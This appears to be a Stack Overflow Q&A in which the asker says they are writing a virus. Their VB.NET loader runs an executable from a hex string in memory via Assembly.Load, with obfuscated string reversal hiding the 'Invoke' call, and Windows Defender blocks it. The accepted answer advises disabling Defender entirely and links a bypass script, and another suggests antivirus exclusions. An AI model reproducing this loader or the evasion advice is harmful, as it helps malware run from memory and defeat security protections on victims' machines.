Operation did not complete successfully because the file contains a virus or potentially unwanted software. (Exception from HRESULT: 0x800700E1)

Question

Guys I have problem while coding in vb.net in visual studio. Here's my code which will convert .EXE file Hex to byte and directly run from memory.

Imports System.Linq,System.Reflection
              Public Module Module1
                     Public Sub Main()
                                 Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
                                 Dim q1 As Object = Assembly.Load(HexToByte(n))
                                 Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
                                 Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)

                     End Sub
                     Public Function HexToByte(ByVal str As String) As Byte()
                                 Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
                                 Return xData
                     End Function
             End Module

When I debug it using F5 key, it shows full message as below:

System.BadImageFormatException: 
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. 
An attempt was made to load a program with an incorrect format.'

And also

Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software. 
(Exception from HRESULT: 0x800700E1)

Guys as these messages states that I am coding a virus and also it is true.
But I have using this code a lot of times but it didn't return any exception.
But now it is doesn't allows me. How to fix that thing ???

score 2 · Answer 1 · answered Sep 15 '21 at 02:35

I just run into the same problem while executing some golang code on Windows 10. It turns out that Windows Security has been treating the temporary file in something like C:\Users\<user-name>\AppData\Local\Temp\go-buildxxxxxxxxx\b00x\exe\app.exe for running my app.go script as a virus or potentially unwanted software. One quick fix is to add exclusion via Windows Security by extension, but I am not sure if this is best practice though because this would weaken your security.

Note the above "x" represent digits that I am trying to hide to keep things generic.

score 0 · Accepted Answer · answered Jul 31 '20 at 08:01

0

As it mentions that it contains a virus,
So probably AMSI(Win Defender Component) is blocking the virus from being running,

As this error message also occurs in powershell when executing malicious command,
And hence AMSI stops it, info taken from 0x00-0x00.github.io

Run this VBS script to disable defender completely,
https://github.com/NYAN-x-CAT/Bypass-Windows-Defender-VBS/blob/master/script.vbs

answered Jul 31 '20 at 08:01

Sorry IwontTell

466
10
29

[Don't paste images of text](https://meta.stackoverflow.com/q/303812/13860). That's nearly impossible to read. – Jonathan Hall Apr 19 '22 at 10:21
1

I can read it fine. But it does reduce searchability on the answer, just not as much as the screenshot would have reduced searchability if it were in the question. – Chris Strickland Apr 19 '22 at 10:24

Operation did not complete successfully because the file contains a virus or potentially unwanted software. (Exception from HRESULT: 0x800700E1)

2 Answers2

Linked

Related